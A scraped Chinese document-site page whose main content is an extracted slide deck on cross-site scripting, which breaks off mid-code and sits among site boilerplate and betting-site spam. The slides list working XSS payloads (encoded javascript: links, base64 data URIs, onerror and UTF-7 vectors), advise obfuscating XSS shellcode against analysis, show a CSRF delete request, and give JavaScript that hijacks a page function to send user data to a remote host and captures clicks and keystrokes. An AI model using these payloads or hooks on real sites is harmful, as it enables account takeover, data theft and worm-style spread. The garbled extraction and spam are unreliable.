- 1、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
- 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
确认输出 一些经常造成问题的编码如下: “ quot; ‘ apos; amp; lt; gt; 消除危险的插入点 img src=“usercontrol” input name=“usercontrol” type=“” div id=“usercontrol” value=“usercontrol” Usercontrol=用户可以控制的数据 QA ? Click to edit company slogan . * 防:noscript, ie8 xss filter, ff csp, anti-xss lib, owasp的xss防御方案, google的浏览器安全手册… 攻:bypass,bypass… * 05年的samy xss worm感染上百万myspace用户 蠕虫式的DDOS、挂马攻击、刷广告、刷流量、破坏网上数据 与pc机上的病毒有很多相似性 * * XSS Exploit保护 1 XSS点可以出现在很多位置 html/xml元素、元素属性、CSS内 flash, applet, wmf, pdf, word online等 导致XSS的原因很多 代码逻辑问题导致的XSS html内嵌的媒体元素导致的XSS 浏览器特性、解析差异、bugs导致的XSS 前后台、浏览器编码处理不一致导致的XSS …… XSS Exploit保护 2 例一 a href=#106#97#118#97#115#99#114#105#112#116#58#97#108#101#114#116#40#49#41Test/a a href=data:text/html;base64,PHNjcmlwdD5hbGVydCgvWFNTLyk8L3NjcmlwdD4=Test/a XSS Exploit保护 3 例二 img src= onerror=alert(/xeye/)/ +ACI- onmouseover=+ACI-alert(/xeye/)+ADsAIg- x=+ACI- %A2%BE%BCscript%BEalert(/xeye/);%BC/script%BE XSS ShellCode保护 1 保护代码不被轻易获取 如前面介绍的本地存储方案 服务端验证保护 referer判断, RSA验证等 服务端跳转、伪装等 保护代码不被轻易理解 各种对称加密算法 各种编码转换 我们最为推荐的是各种变态的加花混淆方法 XSS ShellCode保护 2 加密加花 变量名由下划线_构成 js内置函数可以通过对象遍历方式找到 自启动方式 1 我们把SNS平台当做一个WEB OS 当用户登录自己的账号时,实际上等于运行了当前授权状态下的WEB OS UI部分是DHTML, Flash等 客户端逻辑控制是JavaScript 身份验证方式是一段保存在本地的cookie 这个WEB OS同样有自己的权限划分、授权方式 并严格遵循浏览器宿主的安全策略 自启动方式 2 XSS Exploit要加载执行就需要用户行为触发 以人人网为例: 用户登录后跳转到页面 这个页面可以查看到好友的各种动态 好友分享的描述中存在XSS,随着用户登录而触发exploit ,并加载存储在各处的shellcode执行 好友分享是可以控制的 不过情况不总是如此的美好 修改用户状态 使用WEB环境的原生态接口:) 删除数据 很多SNS平台不在意CSRF攻击 随便get请求http://www.victimSNS.com/DelEntry.do?id=334956即可删除一篇日志 比如new Image().src= http://www.victimSNS.com/DelEntry.do?id=334956 劫持函数与监听事件 1 劫持其它函数 在函数执行之前,定义之后进行劫持 比如showStatus函数可以显示用户当前状态 劫持: var _s= showStatus;function showStatus=(o){new Image.src=http://remote_domain/l.php?log=+str(o);_s(o);} 重写函数 要混淆其它函数的执行逻辑时,可以考虑直接重写函数 劫持函数与监听事件 2 劫持链接onclick事件 监听键盘onkeydown事件 for(i=0;idocument.links.length;i++){ document.links[i].onclick = hijack; } document.onkeydown=function(e){ if(!e)e=window.event; try{hijack();}c
您可能关注的文档
- 2016年科技计划改革与管理---计划项目宣讲课件及教材分析.ppt
- 生活中的立体图形(一)及有关解析.ppt
- 四川美术学院及对策创新.doc
- 怎样创新内蒙古民族大学.doc
- 深入探析山东润峰汽车车身制造有限公司.doc
- 基于APS全文数据库使用指南.ppt
- 关于专题八从血肉长城到钢铁长城.doc
- 基于UL电子线(ApplianceWiringMaterial)---(AVLV2)UL通迅线.ppt
- 北师大版四年级下册第二单元认识三角形和四边形及教材分析.ppt
- 科学创新形而上学何以可能.ppt
- 《GB/T 29025.1-2025粒度分析 电阻法 第1部分:小孔管法》.pdf
- 《GB/T 37034.2-2025航空电子过程管理 防伪 第2部分:来源于非授权经销商电子元器件的管理》.pdf
- 中国国家标准 GB/T 37034.2-2025航空电子过程管理 防伪 第2部分:来源于非授权经销商电子元器件的管理.pdf
- GB/T 6113.102-2025无线电骚扰和抗扰度测量设备和测量方法规范 第1-2部分:无线电骚扰和抗扰度测量设备 传导骚扰测量的耦合装置.pdf
- GB/T 13609-2025天然气 气体取样.pdf
- 中国国家标准 GB/T 13609-2025天然气 气体取样.pdf
- 《GB/T 13609-2025天然气 气体取样》.pdf
- GB/T 19629-2025医用电气设备 X射线诊断影像中使用的电离室和(或)半导体探测器剂量计.pdf
- 《GB/T 19629-2025医用电气设备 X射线诊断影像中使用的电离室和(或)半导体探测器剂量计》.pdf
- 中国国家标准 GB/T 19629-2025医用电气设备 X射线诊断影像中使用的电离室和(或)半导体探测器剂量计.pdf
最近下载
- 【推荐下载】必威体育精装版哈尔滨中考英语词汇表.docx VIP
- 2025年证券公司高级管理人员水平评价测试历年参考题库含答案详解.docx VIP
- 哈尔滨中考英语词汇表.docx VIP
- 高频精选:成都社区面试题及答案.doc VIP
- 西门子SIMICAS产品手册.pdf VIP
- 2026中国军用综合训练环境(STE)解决方案行业现状动态与发展战略研究报告.docx
- 《新编国际贸易》教学课件 何元贵 第一章导论.ppt VIP
- 成人2型糖尿病口服降糖药联合治疗专家共识(2025版)解读PPT课件.pptx VIP
- FST-3000上海信东浮筒液位计.doc VIP
- 《新编国际贸易》教学课件 何元贵 第二章.ppt VIP
有哪些信誉好的足球投注网站
文档评论(0)